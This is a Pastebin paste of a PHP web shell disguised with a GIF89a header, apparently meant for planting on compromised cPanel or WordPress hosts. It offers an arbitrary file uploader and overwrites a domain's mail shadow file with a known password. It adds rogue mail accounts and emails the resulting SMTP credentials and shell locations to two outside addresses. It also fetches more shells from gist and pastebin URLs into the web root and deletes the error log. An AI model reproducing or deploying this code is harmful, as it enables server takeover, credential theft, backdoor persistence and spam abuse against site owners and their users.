SHARE
TWEET

HTHTHHT

a guest Apr 2nd, 2019 123 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. GIF89a1
  2. GIF89a1
  3.  
  4. <center>
  5. <?php
  6. echo '<center><h1>UPLOADER BY ./IzunaWeb & Madara</h1>'.'<br>'.'Uname : '.php_uname().'<br> Posisi : '.$cwd = getcwd(); Echo '<br><br><center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) {     move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);     Echo "<script>alert('upload Done');          </script><b>DR SH3LL A FAIT SON BOULOT ;)</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; }
  7. @ini_set('output_buffering', 0);
  8. set_time_limit(0);
  9. ini_set('memory_limit', '64M');
  10. ini_set('max_execution_time',0);
  11.  
  12. $ips = getenv('REMOTE_ADDR');
  13.  
  14. $wr = 'infos:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
  15. hussam:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
  16. abi_layla:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
  17. accountmu:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
  18. adminustratro:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
  19. salesman:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
  20. ';
  21. $hm = 'infos:x:534:532::/home/$user/mail/$t/info:/home/$user
  22. hussam:x:534:532::/home/$user/mail/$t/hussam:/home/$user
  23. abi_layla:x:534:532::/home/$user/mail/$t/jancok:/home/$user
  24. accountmu:x:534:532::/home/$user/mail/$t/account:/home/$user
  25. adminustratro:x:534:532::/home/$user/mail/$t/t:/home/$user
  26. salesman:x:534:532::/home/$user/mail/$t/salesman:/home/$user
  27. ';
  28. $ports=array(25, 587, 465, 110, 995, 143 , 993);
  29. $primary_port='25';
  30. $user=get_current_user();
  31. $password='kontol87';
  32. $pwd = crypt($password,'$6$kontol87$');
  33.  $t = $_SERVER['SERVER_NAME'];
  34.  $t = @str_replace("www.","",$t);
  35. @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow');
  36. $ex=explode("\r\n",$passwd);
  37. @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.kontol87.bak');
  38. @unlink('/home/'.$user.'/etc/'.$t.'/shadow');
  39. foreach($ex as $ex){
  40. $ex=explode(':',$ex);
  41. $e= $ex[0];
  42. if ($e){
  43. $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b);
  44. echo '<center><span style=\'color:#00ff00;\'>'.$t.'|25|'.$e.'@'.$t.'|'.$password.'<br>';
  45. }}
  46. $c = fopen('/home/'.$user.'/etc/'.$t.'/passwd', 'a+');
  47. fwrite($c, $hm);
  48. fclose($c);
  49. $f = fopen('/home/'.$user.'/etc/'.$t.'/shadow', 'a+');
  50. fwrite($f, $wr);
  51. fclose($f);
  52. $parm = 'https://'.$t.':2096';
  53. $peli = 'D-nCtnVO%JNl';
  54. $kirim = '
  55.  
  56.        SMTP AUTO CREATE
  57.        
  58. '.$t.'|25|'.$e.'@'.$t.'|'.$password.'
  59. --------------------------------------------
  60. '.$parm.' | infos@'.$t.' | ' .$peli.'
  61. '.$parm.' | hussam@'.$t.' | ' .$peli.'
  62. '.$parm.' | abi_layla@'.$t.' | ' .$peli.'
  63. '.$parm.' | accountmu@'.$t.' | ' .$peli.'
  64. '.$parm.' | adminustratro@'.$t.' | ' .$peli.'
  65. '.$parm.' | salesman@'.$t.' | ' .$peli.'
  66.  
  67.  
  68. ';
  69. header('Content-Type: text/html; charset=UTF-8');
  70. $tujuanmail = 'tampungan.bakdur@gmail.com,kefiex@hotmail.com';
  71. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  72. $pesan_alert = "Wso - /wp-includes/js/include.php \n idbv2 - /wp-content/themes/anu.php \n uploader - /wp-admin/user/.wsa.php \r\n [ " . $_SERVER['SERVER_NAME'] . " ]";
  73. mail($tujuanmail, "Plugin Auto Wget", $pesan_alert, $kirim);
  74. function http_get($url){
  75. $im = curl_init($url);
  76. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  77. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  78. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  79. curl_setopt($im, CURLOPT_HEADER, 0);
  80. return curl_exec($im);
  81. curl_close($im);
  82. }
  83. $check1 = $_SERVER['DOCUMENT_ROOT'] . "/cache/include.php" ;
  84. $text1 = http_get('https://gist.githubusercontent.com/obik87/fdaecaeda894cc9853ea53da1d1940fc/raw/92f687949dbf8a1ef37ef5e592fb8bfdde1a7ab3/waa');
  85. $open1 = fopen($check1, 'w');
  86. fwrite($open1, $text1);
  87. fclose($open1);
  88. if(file_exists($check1)){
  89. }
  90. $check2 = $_SERVER['DOCUMENT_ROOT'] . "/admin/anu.php" ;
  91. $text2 = http_get('https://gist.githubusercontent.com/obik87/fdaecaeda894cc9853ea53da1d1940fc/raw/92f687949dbf8a1ef37ef5e592fb8bfdde1a7ab3/waa');
  92. $open2 = fopen($check2, 'w');
  93. fwrite($open2, $text2);
  94. fclose($open2);
  95. if(file_exists($check2)){
  96. }
  97. $check3 = $_SERVER['DOCUMENT_ROOT'] . "/upload/.wsa.php" ;
  98. $text3 = http_get('https://pastebin.com/raw/BbcCvJ9S');
  99. $open3 = fopen($check3, 'w');
  100. fwrite($open3, $text3);
  101. fclose($open3);
  102. if(file_exists($check3)){
  103. }
  104. $check21 = $_SERVER['DOCUMENT_ROOT'] . "/+.php" ;
  105. $text21 = http_get('https://pastebin.com/raw/XewAB4M0');
  106. $open21 = fopen($check21, 'w');
  107. fwrite($open21, $text21);
  108. fclose($open21);
  109. if(file_exists($check21)){
  110. }
  111. unlink("error_log");
  112. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top